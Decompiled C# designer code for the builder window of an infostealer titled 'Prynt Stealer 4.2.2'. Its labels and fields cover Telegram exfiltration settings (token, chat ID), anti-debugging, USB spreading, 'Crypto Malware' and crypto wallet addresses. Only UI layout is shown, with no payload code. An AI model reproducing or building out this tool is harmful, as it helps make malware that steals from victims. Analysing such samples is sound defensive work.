			this.label12.Location = new global::System.Drawing.Point(665, 89);
			this.label12.Margin = new global::System.Windows.Forms.Padding(4, 0, 4, 0);
			this.label12.Name = "label12";
			this.label12.Size = new global::System.Drawing.Size(221, 30);
			this.label12.TabIndex = 48;
			this.label12.Text = "Telegram Settings";
			this.label10.AutoSize = true;
			this.label10.BackColor = global::System.Drawing.Color.Transparent;
			this.label10.Font = new global::System.Drawing.Font("Microsoft Sans Serif", 10.25f);
			this.label10.ForeColor = global::System.Drawing.Color.White;
			this.label10.Location = new global::System.Drawing.Point(407, 215);
			this.label10.Margin = new global::System.Windows.Forms.Padding(4, 0, 4, 0);
			this.label10.Name = "label10";
			this.label10.Size = new global::System.Drawing.Size(133, 22);
			this.label10.TabIndex = 47;
			this.label10.Text = "Anti Debugging";
			this.label4.AutoSize = true;
			this.label4.BackColor = global::System.Drawing.Color.Transparent;
			this.label4.Font = new global::System.Drawing.Font("Microsoft Sans Serif", 10.25f);
			this.label4.ForeColor = global::System.Drawing.Color.White;
			this.label4.Location = new global::System.Drawing.Point(461, 282);
			this.label4.Margin = new global::System.Windows.Forms.Padding(4, 0, 4, 0);
			this.label4.Name = "label4";
			this.label4.Size = new global::System.Drawing.Size(135, 22);
			this.label4.TabIndex = 46;
			this.label4.Text = "Crypto Malware";
			this.checkBox3.AllowBindingControlAnimation = true;
			this.checkBox3.AllowBindingControlColorChanges = false;
			this.checkBox3.AllowBindingControlLocation = true;
			this.checkBox3.AllowCheckBoxAnimation = false;
			this.checkBox3.AllowCheckmarkAnimation = true;
			this.checkBox3.AllowOnHoverStates = true;
			this.checkBox3.AutoCheck = true;
			this.checkBox3.BackColor = global::System.Drawing.Color.Transparent;
			this.checkBox3.BackgroundImage = (global::System.Drawing.Image)componentResourceManager.GetObject("checkBox3.BackgroundImage");
			this.checkBox3.BackgroundImageLayout = global::System.Windows.Forms.ImageLayout.Zoom;
			this.checkBox3.BindingControlPosition = global::Bunifu.UI.WinForms.BunifuCheckBox.BindingControlPositions.Right;
			this.checkBox3.BorderRadius = 12;
			this.checkBox3.Checked = true;
			this.checkBox3.CheckState = global::Bunifu.UI.WinForms.BunifuCheckBox.CheckStates.Checked;
			this.checkBox3.Cursor = global::System.Windows.Forms.Cursors.Default;
			this.checkBox3.CustomCheckmarkImage = null;
			this.checkBox3.Location = new global::System.Drawing.Point(396, 249);
			this.checkBox3.Margin = new global::System.Windows.Forms.Padding(4, 4, 4, 4);
			this.checkBox3.MinimumSize = new global::System.Drawing.Size(23, 21);
			this.checkBox3.Name = "checkBox3";
			this.checkBox3.OnCheck.BorderColor = global::System.Drawing.Color.DodgerBlue;
			this.checkBox3.OnCheck.BorderRadius = 12;
			this.checkBox3.OnCheck.BorderThickness = 2;
			this.checkBox3.OnCheck.CheckBoxColor = global::System.Drawing.Color.DodgerBlue;
			this.checkBox3.OnCheck.CheckmarkColor = global::System.Drawing.Color.White;
			this.checkBox3.OnCheck.CheckmarkThickness = 2;
			this.checkBox3.OnDisable.BorderColor = global::System.Drawing.Color.LightGray;
			this.checkBox3.OnDisable.BorderRadius = 12;
			this.checkBox3.OnDisable.BorderThickness = 2;
			this.checkBox3.OnDisable.CheckBoxColor = global::System.Drawing.Color.Transparent;
			this.checkBox3.OnDisable.CheckmarkColor = global::System.Drawing.Color.LightGray;
			this.checkBox3.OnDisable.CheckmarkThickness = 2;
			this.checkBox3.OnHoverChecked.BorderColor = global::System.Drawing.Color.FromArgb(105, 181, 255);
			this.checkBox3.OnHoverChecked.BorderRadius = 12;
			this.checkBox3.OnHoverChecked.BorderThickness = 2;
			this.checkBox3.OnHoverChecked.CheckBoxColor = global::System.Drawing.Color.FromArgb(105, 181, 255);
			this.checkBox3.OnHoverChecked.CheckmarkColor = global::System.Drawing.Color.White;
			this.checkBox3.OnHoverChecked.CheckmarkThickness = 2;
			this.checkBox3.OnHoverUnchecked.BorderColor = global::System.Drawing.Color.FromArgb(105, 181, 255);
			this.checkBox3.OnHoverUnchecked.BorderRadius = 12;
			this.checkBox3.OnHoverUnchecked.BorderThickness = 1;
			this.checkBox3.OnHoverUnchecked.CheckBoxColor = global::System.Drawing.Color.Transparent;
			this.checkBox3.OnUncheck.BorderColor = global::System.Drawing.Color.DarkGray;
			this.checkBox3.OnUncheck.BorderRadius = 12;
			this.checkBox3.OnUncheck.BorderThickness = 1;
			this.checkBox3.OnUncheck.CheckBoxColor = global::System.Drawing.Color.Transparent;
			this.checkBox3.Size = new global::System.Drawing.Size(28, 28);
			this.checkBox3.Style = global::Bunifu.UI.WinForms.BunifuCheckBox.CheckBoxStyles.Bunifu;
			this.checkBox3.TabIndex = 45;
			this.checkBox3.ThreeState = false;
			this.checkBox3.ToolTipText = null;
			this.checkBox2.AllowBindingControlAnimation = true;
			this.checkBox2.AllowBindingControlColorChanges = false;
			this.checkBox2.AllowBindingControlLocation = true;
			this.checkBox2.AllowCheckBoxAnimation = false;
			this.checkBox2.AllowCheckmarkAnimation = true;
			this.checkBox2.AllowOnHoverStates = true;
			this.checkBox2.AutoCheck = true;
			this.checkBox2.BackColor = global::System.Drawing.Color.Transparent;
			this.checkBox2.BackgroundImage = (global::System.Drawing.Image)componentResourceManager.GetObject("checkBox2.BackgroundImage");
			this.checkBox2.BackgroundImageLayout = global::System.Windows.Forms.ImageLayout.Zoom;
			this.checkBox2.BindingControlPosition = global::Bunifu.UI.WinForms.BunifuCheckBox.BindingControlPositions.Right;
			this.checkBox2.BorderRadius = 12;
			this.checkBox2.Checked = true;
			this.checkBox2.CheckState = global::Bunifu.UI.WinForms.BunifuCheckBox.CheckStates.Checked;
			this.checkBox2.Cursor = global::System.Windows.Forms.Cursors.Default;
			this.checkBox2.CustomCheckmarkImage = null;
			this.checkBox2.Location = new global::System.Drawing.Point(425, 282);
			this.checkBox2.Margin = new global::System.Windows.Forms.Padding(4, 4, 4, 4);
			this.checkBox2.MinimumSize = new global::System.Drawing.Size(23, 21);
			this.checkBox2.Name = "checkBox2";
			this.checkBox2.OnCheck.BorderColor = global::System.Drawing.Color.DodgerBlue;
			this.checkBox2.OnCheck.BorderRadius = 12;
			this.checkBox2.OnCheck.BorderThickness = 2;
			this.checkBox2.OnCheck.CheckBoxColor = global::System.Drawing.Color.DodgerBlue;
			this.checkBox2.OnCheck.CheckmarkColor = global::System.Drawing.Color.White;
			this.checkBox2.OnCheck.CheckmarkThickness = 2;
			this.checkBox2.OnDisable.BorderColor = global::System.Drawing.Color.LightGray;
			this.checkBox2.OnDisable.BorderRadius = 12;
			this.checkBox2.OnDisable.BorderThickness = 2;
			this.checkBox2.OnDisable.CheckBoxColor = global::System.Drawing.Color.Transparent;
			this.checkBox2.OnDisable.CheckmarkColor = global::System.Drawing.Color.LightGray;
			this.checkBox2.OnDisable.CheckmarkThickness = 2;
			this.checkBox2.OnHoverChecked.BorderColor = global::System.Drawing.Color.FromArgb(105, 181, 255);
			this.checkBox2.OnHoverChecked.BorderRadius = 12;
			this.checkBox2.OnHoverChecked.BorderThickness = 2;
			this.checkBox2.OnHoverChecked.CheckBoxColor = global::System.Drawing.Color.FromArgb(105, 181, 255);
			this.checkBox2.OnHoverChecked.CheckmarkColor = global::System.Drawing.Color.White;
			this.checkBox2.OnHoverChecked.CheckmarkThickness = 2;
			this.checkBox2.OnHoverUnchecked.BorderColor = global::System.Drawing.Color.FromArgb(105, 181, 255);
			this.checkBox2.OnHoverUnchecked.BorderRadius = 12;
			this.checkBox2.OnHoverUnchecked.BorderThickness = 1;
			this.checkBox2.OnHoverUnchecked.CheckBoxColor = global::System.Drawing.Color.Transparent;
			this.checkBox2.OnUncheck.BorderColor = global::System.Drawing.Color.DarkGray;
			this.checkBox2.OnUncheck.BorderRadius = 12;
			this.checkBox2.OnUncheck.BorderThickness = 1;
			this.checkBox2.OnUncheck.CheckBoxColor = global::System.Drawing.Color.Transparent;
			this.checkBox2.Size = new global::System.Drawing.Size(28, 28);
			this.checkBox2.Style = global::Bunifu.UI.WinForms.BunifuCheckBox.CheckBoxStyles.Bunifu;
			this.checkBox2.TabIndex = 44;
			this.checkBox2.ThreeState = false;
			this.checkBox2.ToolTipText = null;
			this.checkBox1.AllowBindingControlAnimation = true;
			this.checkBox1.AllowBindingControlColorChanges = false;
			this.checkBox1.AllowBindingControlLocation = true;
			this.checkBox1.AllowCheckBoxAnimation = false;
			this.checkBox1.AllowCheckmarkAnimation = true;
			this.checkBox1.AllowOnHoverStates = true;
			this.checkBox1.AutoCheck = true;
			this.checkBox1.BackColor = global::System.Drawing.Color.Transparent;
			this.checkBox1.BackgroundImage = (global::System.Drawing.Image)componentResourceManager.GetObject("checkBox1.BackgroundImage");
			this.checkBox1.BackgroundImageLayout = global::System.Windows.Forms.ImageLayout.Zoom;
			this.checkBox1.BindingControlPosition = global::Bunifu.UI.WinForms.BunifuCheckBox.BindingControlPositions.Right;
			this.checkBox1.BorderRadius = 12;
			this.checkBox1.Checked = true;
			this.checkBox1.CheckState = global::Bunifu.UI.WinForms.BunifuCheckBox.CheckStates.Checked;
			this.checkBox1.Cursor = global::System.Windows.Forms.Cursors.Default;
			this.checkBox1.CustomCheckmarkImage = null;
			this.checkBox1.Location = new global::System.Drawing.Point(371, 215);
			this.checkBox1.Margin = new global::System.Windows.Forms.Padding(4, 4, 4, 4);
			this.checkBox1.MinimumSize = new global::System.Drawing.Size(23, 21);
			this.checkBox1.Name = "checkBox1";
			this.checkBox1.OnCheck.BorderColor = global::System.Drawing.Color.DodgerBlue;
			this.checkBox1.OnCheck.BorderRadius = 12;
			this.checkBox1.OnCheck.BorderThickness = 2;
			this.checkBox1.OnCheck.CheckBoxColor = global::System.Drawing.Color.DodgerBlue;
			this.checkBox1.OnCheck.CheckmarkColor = global::System.Drawing.Color.White;
			this.checkBox1.OnCheck.CheckmarkThickness = 2;
			this.checkBox1.OnDisable.BorderColor = global::System.Drawing.Color.LightGray;
			this.checkBox1.OnDisable.BorderRadius = 12;
			this.checkBox1.OnDisable.BorderThickness = 2;
			this.checkBox1.OnDisable.CheckBoxColor = global::System.Drawing.Color.Transparent;
			this.checkBox1.OnDisable.CheckmarkColor = global::System.Drawing.Color.LightGray;
			this.checkBox1.OnDisable.CheckmarkThickness = 2;
			this.checkBox1.OnHoverChecked.BorderColor = global::System.Drawing.Color.FromArgb(105, 181, 255);
			this.checkBox1.OnHoverChecked.BorderRadius = 12;
			this.checkBox1.OnHoverChecked.BorderThickness = 2;
			this.checkBox1.OnHoverChecked.CheckBoxColor = global::System.Drawing.Color.FromArgb(105, 181, 255);
			this.checkBox1.OnHoverChecked.CheckmarkColor = global::System.Drawing.Color.White;
			this.checkBox1.OnHoverChecked.CheckmarkThickness = 2;
			this.checkBox1.OnHoverUnchecked.BorderColor = global::System.Drawing.Color.FromArgb(105, 181, 255);
			this.checkBox1.OnHoverUnchecked.BorderRadius = 12;
			this.checkBox1.OnHoverUnchecked.BorderThickness = 1;
			this.checkBox1.OnHoverUnchecked.CheckBoxColor = global::System.Drawing.Color.Transparent;
			this.checkBox1.OnUncheck.BorderColor = global::System.Drawing.Color.DarkGray;
			this.checkBox1.OnUncheck.BorderRadius = 12;
			this.checkBox1.OnUncheck.BorderThickness = 1;
			this.checkBox1.OnUncheck.CheckBoxColor = global::System.Drawing.Color.Transparent;
			this.checkBox1.Size = new global::System.Drawing.Size(28, 28);
			this.checkBox1.Style = global::Bunifu.UI.WinForms.BunifuCheckBox.CheckBoxStyles.Bunifu;
			this.checkBox1.TabIndex = 43;
			this.checkBox1.ThreeState = false;
			this.checkBox1.ToolTipText = null;
			this.label11.AutoSize = true;
			this.label11.BackColor = global::System.Drawing.Color.Transparent;
			this.label11.Font = new global::System.Drawing.Font("Microsoft Sans Serif", 10.25f);
			this.label11.ForeColor = global::System.Drawing.Color.White;
			this.label11.Location = new global::System.Drawing.Point(432, 249);
			this.label11.Margin = new global::System.Windows.Forms.Padding(4, 0, 4, 0);
			this.label11.Name = "label11";
			this.label11.Size = new global::System.Drawing.Size(110, 22);
			this.label11.TabIndex = 42;
			this.label11.Text = "USB Spread";
			this.txtIcon.Cursor = global::System.Windows.Forms.Cursors.IBeam;
			this.txtIcon.DefaultText = "";
			this.txtIcon.DisabledState.BorderColor = global::System.Drawing.Color.FromArgb(208, 208, 208);
			this.txtIcon.DisabledState.FillColor = global::System.Drawing.Color.FromArgb(226, 226, 226);
			this.txtIcon.DisabledState.ForeColor = global::System.Drawing.Color.FromArgb(138, 138, 138);
			this.txtIcon.DisabledState.Parent = this.txtIcon;
			this.txtIcon.DisabledState.PlaceholderForeColor = global::System.Drawing.Color.FromArgb(138, 138, 138);
			this.txtIcon.FocusedState.BorderColor = global::System.Drawing.Color.FromArgb(94, 148, 255);
			this.txtIcon.FocusedState.Parent = this.txtIcon;
			this.txtIcon.HoveredState.BorderColor = global::System.Drawing.Color.FromArgb(94, 148, 255);
			this.txtIcon.HoveredState.Parent = this.txtIcon;
			this.txtIcon.Location = new global::System.Drawing.Point(851, 396);
			this.txtIcon.Margin = new global::System.Windows.Forms.Padding(5, 5, 5, 5);
			this.txtIcon.Name = "txtIcon";
			this.txtIcon.PasswordChar = '\0';
			this.txtIcon.PlaceholderText = "";
			this.txtIcon.SelectedText = "";
			this.txtIcon.ShadowDecoration.Parent = this.txtIcon;
			this.txtIcon.Size = new global::System.Drawing.Size(123, 41);
			this.txtIcon.TabIndex = 39;
			this.txtIcon.TextAlign = global::System.Windows.Forms.HorizontalAlignment.Center;
			this.token.Cursor = global::System.Windows.Forms.Cursors.IBeam;
			this.token.DefaultText = "Token";
			this.token.DisabledState.BorderColor = global::System.Drawing.Color.FromArgb(208, 208, 208);
			this.token.DisabledState.FillColor = global::System.Drawing.Color.FromArgb(226, 226, 226);
			this.token.DisabledState.ForeColor = global::System.Drawing.Color.FromArgb(138, 138, 138);
			this.token.DisabledState.Parent = this.token;
			this.token.DisabledState.PlaceholderForeColor = global::System.Drawing.Color.FromArgb(138, 138, 138);
			this.token.FocusedState.BorderColor = global::System.Drawing.Color.FromArgb(94, 148, 255);
			this.token.FocusedState.Parent = this.token;
			this.token.HoveredState.BorderColor = global::System.Drawing.Color.FromArgb(94, 148, 255);
			this.token.HoveredState.Parent = this.token;
			this.token.Location = new global::System.Drawing.Point(656, 158);
			this.token.Margin = new global::System.Windows.Forms.Padding(5, 5, 5, 5);
			this.token.Name = "token";
			this.token.PasswordChar = '\0';
			this.token.PlaceholderText = "";
			this.token.SelectedText = "";
			this.token.ShadowDecoration.Parent = this.token;
			this.token.Size = new global::System.Drawing.Size(243, 50);
			this.token.TabIndex = 38;
			this.token.TextAlign = global::System.Windows.Forms.HorizontalAlignment.Center;
			this.numericUpDown1.BackColor = global::System.Drawing.Color.Transparent;
			this.numericUpDown1.Cursor = global::System.Windows.Forms.Cursors.IBeam;
			this.numericUpDown1.DisabledState.BorderColor = global::System.Drawing.Color.FromArgb(208, 208, 208);
			this.numericUpDown1.DisabledState.FillColor = global::System.Drawing.Color.FromArgb(226, 226, 226);
			this.numericUpDown1.DisabledState.ForeColor = global::System.Drawing.Color.FromArgb(138, 138, 138);
			this.numericUpDown1.DisabledState.Parent = this.numericUpDown1;
			this.numericUpDown1.DisabledState.UpDownButtonFillColor = global::System.Drawing.Color.FromArgb(177, 177, 177);
			this.numericUpDown1.DisabledState.UpDownButtonForeColor = global::System.Drawing.Color.FromArgb(203, 203, 203);
			this.numericUpDown1.FocusedState.BorderColor = global::System.Drawing.Color.FromArgb(94, 148, 255);
			this.numericUpDown1.FocusedState.Parent = this.numericUpDown1;
			this.numericUpDown1.Font = new global::System.Drawing.Font("Segoe UI", 9f, global::System.Drawing.FontStyle.Regular, global::System.Drawing.GraphicsUnit.Point, 0);
			this.numericUpDown1.ForeColor = global::System.Drawing.Color.FromArgb(126, 137, 149);
			this.numericUpDown1.Location = new global::System.Drawing.Point(171, 410);
			this.numericUpDown1.Margin = new global::System.Windows.Forms.Padding(4, 4, 4, 4);
			this.numericUpDown1.Name = "numericUpDown1";
			this.numericUpDown1.ShadowDecoration.Parent = this.numericUpDown1;
			this.numericUpDown1.Size = new global::System.Drawing.Size(113, 27);
			this.numericUpDown1.TabIndex = 37;
			this.chatid.Cursor = global::System.Windows.Forms.Cursors.IBeam;
			this.chatid.DefaultText = "Chat ID";
			this.chatid.DisabledState.BorderColor = global::System.Drawing.Color.FromArgb(208, 208, 208);
			this.chatid.DisabledState.FillColor = global::System.Drawing.Color.FromArgb(226, 226, 226);
			this.chatid.DisabledState.ForeColor = global::System.Drawing.Color.FromArgb(138, 138, 138);
			this.chatid.DisabledState.Parent = this.chatid;
			this.chatid.DisabledState.PlaceholderForeColor = global::System.Drawing.Color.FromArgb(138, 138, 138);
			this.chatid.FocusedState.BorderColor = global::System.Drawing.Color.FromArgb(94, 148, 255);
			this.chatid.FocusedState.Parent = this.chatid;
			this.chatid.HoveredState.BorderColor = global::System.Drawing.Color.FromArgb(94, 148, 255);
			this.chatid.HoveredState.Parent = this.chatid;
			this.chatid.Location = new global::System.Drawing.Point(656, 215);
			this.chatid.Margin = new global::System.Windows.Forms.Padding(5, 5, 5, 5);
			this.chatid.Name = "chatid";
			this.chatid.PasswordChar = '\0';
			this.chatid.PlaceholderText = "";
			this.chatid.SelectedText = "";
			this.chatid.ShadowDecoration.Parent = this.chatid;
			this.chatid.Size = new global::System.Drawing.Size(243, 50);
			this.chatid.TabIndex = 36;
			this.chatid.TextAlign = global::System.Windows.Forms.HorizontalAlignment.Center;
			this.button2.BackColor = global::System.Drawing.Color.Transparent;
			this.button2.FlatStyle = global::System.Windows.Forms.FlatStyle.Flat;
			this.button2.Font = new global::System.Drawing.Font("Microsoft Sans Serif", 10.2f, global::System.Drawing.FontStyle.Bold | global::System.Drawing.FontStyle.Italic, global::System.Drawing.GraphicsUnit.Point, 0);
			this.button2.ForeColor = global::System.Drawing.SystemColors.MenuHighlight;
			this.button2.Location = new global::System.Drawing.Point(911, 462);
			this.button2.Margin = new global::System.Windows.Forms.Padding(4, 4, 4, 4);
			this.button2.Name = "button2";
			this.button2.Size = new global::System.Drawing.Size(129, 50);
			this.button2.TabIndex = 5;
			this.button2.Text = "Build Prynt";
			this.button2.UseVisualStyleBackColor = false;
			this.button2.Click += new global::System.EventHandler(this.button2_Click);
			this.label9.AutoSize = true;
			this.label9.BackColor = global::System.Drawing.Color.Transparent;
			this.label9.Font = new global::System.Drawing.Font("Microsoft Sans Serif", 15.75f, global::System.Drawing.FontStyle.Bold);
			this.label9.ForeColor = global::System.Drawing.SystemColors.Control;
			this.label9.Location = new global::System.Drawing.Point(4, 351);
			this.label9.Margin = new global::System.Windows.Forms.Padding(4, 0, 4, 0);
			this.label9.Name = "label9";
			this.label9.Size = new global::System.Drawing.Size(69, 31);
			this.label9.TabIndex = 35;
			this.label9.Text = "LTC";
			this.label9.Click += new global::System.EventHandler(this.label9_Click);
			this.label8.AutoSize = true;
			this.label8.BackColor = global::System.Drawing.Color.Transparent;
			this.label8.Font = new global::System.Drawing.Font("Microsoft Sans Serif", 15.75f, global::System.Drawing.FontStyle.Bold);
			this.label8.ForeColor = global::System.Drawing.SystemColors.Control;
			this.label8.Location = new global::System.Drawing.Point(-7, 284);
			this.label8.Margin = new global::System.Windows.Forms.Padding(4, 0, 4, 0);
			this.label8.Name = "label8";
			this.label8.Size = new global::System.Drawing.Size(77, 31);
			this.label8.TabIndex = 34;
			this.label8.Text = "XMR";
			this.label7.AutoSize = true;
			this.label7.BackColor = global::System.Drawing.Color.Transparent;
			this.label7.Font = new global::System.Drawing.Font("Microsoft Sans Serif", 15.75f, global::System.Drawing.FontStyle.Bold);
			this.label7.ForeColor = global::System.Drawing.SystemColors.Control;
			this.label7.Location = new global::System.Drawing.Point(3, 228);
			this.label7.Margin = new global::System.Windows.Forms.Padding(4, 0, 4, 0);
			this.label7.Name = "label7";
			this.label7.Size = new global::System.Drawing.Size(72, 31);
			this.label7.TabIndex = 33;
			this.label7.Text = "ETH";
			this.ltc.Cursor = global::System.Windows.Forms.Cursors.IBeam;
			this.ltc.DefaultText = "";
			this.ltc.DisabledState.BorderColor = global::System.Drawing.Color.FromArgb(208, 208, 208);
			this.ltc.DisabledState.FillColor = global::System.Drawing.Color.FromArgb(226, 226, 226);
			this.ltc.DisabledState.ForeColor = global::System.Drawing.Color.FromArgb(138, 138, 138);
			this.ltc.DisabledState.Parent = this.ltc;
			this.ltc.DisabledState.PlaceholderForeColor = global::System.Drawing.Color.FromArgb(138, 138, 138);
			this.ltc.FocusedState.BorderColor = global::System.Drawing.Color.FromArgb(94, 148, 255);
			this.ltc.FocusedState.Parent = this.ltc;
			this.ltc.HoveredState.BorderColor = global::System.Drawing.Color.FromArgb(94, 148, 255);
			this.ltc.HoveredState.Parent = this.ltc;
			this.ltc.Location = new global::System.Drawing.Point(88, 336);
			this.ltc.Margin = new global::System.Windows.Forms.Padding(5, 5, 5, 5);
			this.ltc.Name = "ltc";
			this.ltc.PasswordChar = '\0';
			this.ltc.PlaceholderText = "";
			this.ltc.SelectedText = "";
			this.ltc.ShadowDecoration.Parent = this.ltc;
			this.ltc.Size = new global::System.Drawing.Size(243, 50);
			this.ltc.TabIndex = 32;
			this.monero.Cursor = global::System.Windows.Forms.Cursors.IBeam;
			this.monero.DefaultText = "";
			this.monero.DisabledState.BorderColor = global::System.Drawing.Color.FromArgb(208, 208, 208);
			this.monero.DisabledState.FillColor = global::System.Drawing.Color.FromArgb(226, 226, 226);
			this.monero.DisabledState.ForeColor = global::System.Drawing.Color.FromArgb(138, 138, 138);
			this.monero.DisabledState.Parent = this.monero;
			this.monero.DisabledState.PlaceholderForeColor = global::System.Drawing.Color.FromArgb(138, 138, 138);
			this.monero.FocusedState.BorderColor = global::System.Drawing.Color.FromArgb(94, 148, 255);
			this.monero.FocusedState.Parent = this.monero;
			this.monero.HoveredState.BorderColor = global::System.Drawing.Color.FromArgb(94, 148, 255);
			this.monero.HoveredState.Parent = this.monero;
			this.monero.Location = new global::System.Drawing.Point(84, 273);
			this.monero.Margin = new global::System.Windows.Forms.Padding(5, 5, 5, 5);
			this.monero.Name = "monero";
			this.monero.PasswordChar = '\0';
			this.monero.PlaceholderText = "";
			this.monero.SelectedText = "";
			this.monero.ShadowDecoration.Parent = this.monero;
			this.monero.Size = new global::System.Drawing.Size(243, 50);
			this.monero.TabIndex = 31;
			this.eth.Cursor = global::System.Windows.Forms.Cursors.IBeam;
			this.eth.DefaultText = "";
			this.eth.DisabledState.BorderColor = global::System.Drawing.Color.FromArgb(208, 208, 208);
			this.eth.DisabledState.FillColor = global::System.Drawing.Color.FromArgb(226, 226, 226);
			this.eth.DisabledState.ForeColor = global::System.Drawing.Color.FromArgb(138, 138, 138);
			this.eth.DisabledState.Parent = this.eth;
			this.eth.DisabledState.PlaceholderForeColor = global::System.Drawing.Color.FromArgb(138, 138, 138);
			this.eth.FocusedState.BorderColor = global::System.Drawing.Color.FromArgb(94, 148, 255);
			this.eth.FocusedState.Parent = this.eth;
			this.eth.HoveredState.BorderColor = global::System.Drawing.Color.FromArgb(94, 148, 255);
			this.eth.HoveredState.Parent = this.eth;
			this.eth.Location = new global::System.Drawing.Point(87, 215);
			this.eth.Margin = new global::System.Windows.Forms.Padding(5, 5, 5, 5);
			this.eth.Name = "eth";
			this.eth.PasswordChar = '\0';
			this.eth.PlaceholderText = "";
			this.eth.SelectedText = "";
			this.eth.ShadowDecoration.Parent = this.eth;
			this.eth.Size = new global::System.Drawing.Size(243, 50);
			this.eth.TabIndex = 30;
			this.btc.Cursor = global::System.Windows.Forms.Cursors.IBeam;
			this.btc.DefaultText = "";
			this.btc.DisabledState.BorderColor = global::System.Drawing.Color.FromArgb(208, 208, 208);
			this.btc.DisabledState.FillColor = global::System.Drawing.Color.FromArgb(226, 226, 226);
			this.btc.DisabledState.ForeColor = global::System.Drawing.Color.FromArgb(138, 138, 138);
			this.btc.DisabledState.Parent = this.btc;
			this.btc.DisabledState.PlaceholderForeColor = global::System.Drawing.Color.FromArgb(138, 138, 138);
			this.btc.FocusedState.BorderColor = global::System.Drawing.Color.FromArgb(94, 148, 255);
			this.btc.FocusedState.Parent = this.btc;
			this.btc.HoveredState.BorderColor = global::System.Drawing.Color.FromArgb(94, 148, 255);
			this.btc.HoveredState.Parent = this.btc;
			this.btc.Location = new global::System.Drawing.Point(88, 158);
			this.btc.Margin = new global::System.Windows.Forms.Padding(5, 5, 5, 5);
			this.btc.Name = "btc";
			this.btc.PasswordChar = '\0';
			this.btc.PlaceholderText = "";
			this.btc.SelectedText = "";
			this.btc.ShadowDecoration.Parent = this.btc;
			this.btc.Size = new global::System.Drawing.Size(243, 50);
			this.btc.TabIndex = 29;
			base.AutoScaleDimensions = new global::System.Drawing.SizeF(8f, 16f);
			base.AutoScaleMode = global::System.Windows.Forms.AutoScaleMode.Font;
			this.BackColor = global::System.Drawing.Color.DodgerBlue;
			this.BackgroundImageLayout = global::System.Windows.Forms.ImageLayout.Stretch;
			base.ClientSize = new global::System.Drawing.Size(1261, 570);
			base.Controls.Add(this.bunifuGradientPanel3);
			base.Controls.Add(this.bunifuGradientPanel2);
			base.Controls.Add(this.bunifuGradientPanel1);
			base.FormBorderStyle = global::System.Windows.Forms.FormBorderStyle.None;
			base.Icon = (global::System.Drawing.Icon)componentResourceManager.GetObject("$this.Icon");
			base.Margin = new global::System.Windows.Forms.Padding(4, 4, 4, 4);
			base.Name = "Form1";
			this.RightToLeft = global::System.Windows.Forms.RightToLeft.No;
			this.Text = "Prynt Stealer 4.2.2";
			base.Load += new global::System.EventHandler(this.Form_Load);
			((global::System.ComponentModel.ISupportInitialize)this.pictureIcon).EndInit();
			this.bunifuGradientPanel1.ResumeLayout(false);
			((global::System.ComponentModel.ISupportInitialize)this.bunifuPictureBox1).EndInit();
			this.bunifuGradientPanel2.ResumeLayout(false);
			this.bunifuGradientPanel2.PerformLayout();
			this.bunifuGradientPanel3.ResumeLayout(false);
			this.bunifuGradientPanel3.PerformLayout();
			((global::System.ComponentModel.ISupportInitialize)this.numericUpDown1).EndInit();
			base.ResumeLayout(false);
		}

		// Token: 0x04000031 RID: 49
		private global::System.ComponentModel.IContainer components;

		// Token: 0x04000032 RID: 50
		private global::System.Windows.Forms.Label label3;

		// Token: 0x04000033 RID: 51
		private global::System.Windows.Forms.PictureBox pictureIcon;

		// Token: 0x04000034 RID: 52
		private global::System.Windows.Forms.Label label5;

		// Token: 0x04000035 RID: 53
		private global::System.Windows.Forms.Label label6;

		// Token: 0x04000036 RID: 54
		private global::System.Windows.Forms.Label label2;

		// Token: 0x04000037 RID: 55
		private global::Bunifu.UI.WinForms.BunifuGradientPanel bunifuGradientPanel1;

		// Token: 0x04000038 RID: 56
		private global::Bunifu.UI.WinForms.BunifuPictureBox bunifuPictureBox1;

		// Token: 0x04000039 RID: 57
		private global::Bunifu.UI.WinForms.BunifuGradientPanel bunifuGradientPanel2;

		// Token: 0x0400003A RID: 58
		private global::Bunifu.UI.WinForms.BunifuGradientPanel bunifuGradientPanel3;

		// Token: 0x0400003B RID: 59
		private global::Bunifu.UI.WinForms.BunifuButton.BunifuButton bunifuButton1;

		// Token: 0x0400003C RID: 60
		private global::Siticone.UI.WinForms.SiticoneRoundedTextBox btc;

		// Token: 0x0400003D RID: 61
		private global::System.Windows.Forms.Label label9;

		// Token: 0x0400003E RID: 62
		private global::System.Windows.Forms.Label label8;

		// Token: 0x0400003F RID: 63
		private global::System.Windows.Forms.Label label7;

		// Token: 0x04000040 RID: 64
		private global::Siticone.UI.WinForms.SiticoneRoundedTextBox ltc;

		// Token: 0x04000041 RID: 65
		private global::Siticone.UI.WinForms.SiticoneRoundedTextBox monero;

		// Token: 0x04000042 RID: 66
		private global::Siticone.UI.WinForms.SiticoneRoundedTextBox eth;

		// Token: 0x04000043 RID: 67
		private global::Siticone.UI.WinForms.SiticoneRoundedTextBox chatid;

		// Token: 0x04000044 RID: 68
		private global::System.Windows.Forms.Label label1;

		// Token: 0x04000045 RID: 69
		private global::Siticone.UI.WinForms.SiticoneRoundedNumericUpDown numericUpDown1;

		// Token: 0x04000046 RID: 70
		private global::Bunifu.UI.WinForms.BunifuCheckBox checkBox1;

		// Token: 0x04000047 RID: 71
		private global::System.Windows.Forms.Label label11;

		// Token: 0x04000048 RID: 72
		private global::Siticone.UI.WinForms.SiticoneRoundedTextBox txtIcon;

		// Token: 0x04000049 RID: 73
		private global::Siticone.UI.WinForms.SiticoneRoundedTextBox token;

		// Token: 0x0400004A RID: 74
		private global::System.Windows.Forms.Button button2;

		// Token: 0x0400004B RID: 75
		private global::Bunifu.UI.WinForms.BunifuCheckBox checkBox3;

		// Token: 0x0400004C RID: 76
		private global::Bunifu.UI.WinForms.BunifuCheckBox checkBox2;

		// Token: 0x0400004D RID: 77
		private global::System.Windows.Forms.Label label10;

		// Token: 0x0400004E RID: 78
		private global::System.Windows.Forms.Label label4;

		// Token: 0x0400004F RID: 79
		private global::Siticone.UI.WinForms.SiticoneCircleButton button1;

		// Token: 0x04000050 RID: 80
		private global::System.Windows.Forms.Label label12;

		// Token: 0x04000051 RID: 81
		private global::Bunifu.UI.WinForms.BunifuButton.BunifuButton bunifuButton2;

		// Token: 0x04000052 RID: 82
		private global::Siticone.UI.WinForms.SiticoneCircleButton siticoneCircleButton1;

		// Token: 0x04000053 RID: 83
		private global::Siticone.UI.WinForms.SiticoneRoundedTextBox password;
	}
}
